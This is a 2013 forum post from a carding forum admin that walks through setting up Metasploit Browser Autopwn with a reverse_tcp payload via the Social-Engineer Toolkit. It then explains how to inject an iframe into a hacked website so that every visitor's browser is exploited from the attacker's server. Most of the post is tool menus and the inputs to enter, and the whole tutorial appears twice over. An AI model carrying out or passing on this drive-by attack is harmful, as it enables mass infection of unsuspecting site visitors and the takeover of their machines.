CardingMafia Admin
03-07-2013, 09:59 AM
In this Topic I will tell you how to hack Traffic of a website ! Well It is a simple way but If yo wanna go advance you can use exploit pack
what will we use in this attack
1# metasploit
2# VPS
3# Iframe
4# Target website
So Lets Start ! Install metasploit in your VPS and Open Set "metasploit social engineering tool kit"
root@Scientist:~# cd /pentest/exploits/set
root@Scientist:/pentest/exploits/set# ./set
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: [email protected] [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>2
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes
after this set your server Ip and port to create a payload !
let us consider 10.10.10.10 is our server Ip and 1337 is our port
-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes
set:webattack> IP address to SET web server (this could be your external IP or hostname):10.10.10.10
set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:no
Now Time to set Exploit !
choose:- Metasploit Browser Autopwn (USE AT OWN RISK!)
metasploit browser autopwn Try all exploits in the database to exploit the computer via browser
Select payload to reverse_tcp or your custom payload
done ....
Now if anyone will visit our server ( http://10.10.10.10:8080)will be fucked :| and metasploit will start exploiting his system
So now here come a mind game ! Now create an Iframe and insert it into your hacked website
so if anyone is visiting target.com he is also visiting 10.10.10.10:8080 in iframe !
So now keep monitoring traffic in terminal !
what will we use in this attack
1# metasploit
2# VPS
3# Iframe
4# Target website
So Lets Start ! Install metasploit in your VPS and Open Set "metasploit social engineering tool kit"
root@Scientist:~# cd /pentest/exploits/set
root@Scientist:/pentest/exploits/set# ./set
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: [email protected] [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>2
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes
after this set your server Ip and port to create a payload !
let us consider 10.10.10.10 is our server Ip and 1337 is our port
-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes
set:webattack> IP address to SET web server (this could be your external IP or hostname):10.10.10.10
set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:no
Now Time to set Exploit !
choose:- Metasploit Browser Autopwn (USE AT OWN RISK!)
metasploit browser autopwn Try all exploits in the database to exploit the computer via browser
Select payload to reverse_tcp or your custom payload
done ....
Now if anyone will visit our server ( http://10.10.10.10:8080)will be fucked :| and metasploit will start exploiting his system
So now here come a mind game ! Now create an Iframe and insert it into your hacked website
so if anyone is visiting target.com he is also visiting 10.10.10.10:8080 in iframe !
So now keep monitoring traffic in terminal !